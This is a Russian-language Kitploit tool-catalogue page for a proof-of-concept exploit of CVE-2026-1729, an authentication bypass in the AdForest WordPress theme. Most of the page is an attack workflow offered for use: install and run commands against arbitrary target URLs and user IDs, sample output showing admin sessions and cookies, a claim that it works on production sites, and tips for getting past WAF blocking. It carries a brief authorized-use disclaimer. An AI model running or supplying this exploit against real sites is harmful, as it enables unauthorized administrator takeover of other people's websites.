Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass — Тема AdForest для WordPress уязвима к обходу аутентификации во всех версиях, включая 6.0.12. Это связано с тем, что плагин не проверяет должным образом личность пользователя перед его аутентификацией через функцию 'sb_login_user_with_otp_fun'. Это позволяет неаутентифицированным злоумышленникам войти в систему, в том числе под учётной записью администратора. | Kitploit
Инструменты/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
6 месяцев назадЕщё не проверено

Описание

Тема AdForest для WordPress уязвима к обходу аутентификации во всех версиях, включая 6.0.12. Это связано с тем, что плагин не проверяет должным образом личность пользователя перед его аутентификацией через функцию 'sb_login_user_with_otp_fun'. Это позволяет неаутентифицированным злоумышленникам войти в систему, в том числе под учётной записью администратора.

Поделиться

CVE-2026-1729 — PoC обхода аутентификации AdForest WordPress

Описание

Простой Proof of Concept для CVE-2026-1729 (PoC) — уязвимость обхода аутентификации в теме WordPress AdForest. Автор: f3ds cr3w est 2oo2 блог

Возможности

  • ✅ Прямой доступ к админке без учётных данных
  • ✅ Работает на боевых (production) WordPress-установках
  • ✅ Не требует настройки Docker
  • ✅ Простой интерфейс командной строки
  • ✅ Сохранение сессии

Требования

  • Python 3.6+
  • библиотека requests

Установка

root@kitploit:~
pip install requests

Использование

Базовое использование

root@kitploit:~
python poc/exploit.py https://target-site.com

Указание конкретного ID пользователя

root@kitploit:~
python poc/exploit.py https://target-site.com --user-id 2

Примеры

root@kitploit:~
# Exploit default admin (user ID 1)
python poc/exploit.py https://example.com

# Exploit specific user account
python poc/exploit.py https://example.com --user-id 5

# Test multiple targets
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

Вывод

root@kitploit:~
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin

🎯 Exploit completed successfully!
You now have admin access to the WordPress site.

Что происходит после эксплуатации

  1. Доступ к админке: Вы получаете полный доступ к /wp-admin/
  2. Сохранение сессии: Эксплойт поддерживает сессионные cookie
  3. Информация о пользователе: Показывает, какая учётная запись скомпрометирована
  4. Прямой доступ: Вы можете сразу получить доступ к консоли администрирования WordPress

Примечания

  • Правомерное использование: Используйте только на сайтах, которыми владеете, или имеете явное разрешение на тестирование
  • Требования к цели: На сайте должна быть установлена тема AdForest
  • Успешность: Работает на уязвимых версиях темы AdForest
  • Без установки: На целевом сервере ничего устанавливать не нужно

Устранение неполадок

Если эксплойт не сработал:

  1. Убедитесь, что установлена тема AdForest
  2. Проверьте, работает ли сайт на WordPress
  3. Убедитесь, что версия темы уязвима
  4. Убедитесь, что WAF или плагины безопасности не блокируют запрос
Скачать инструмент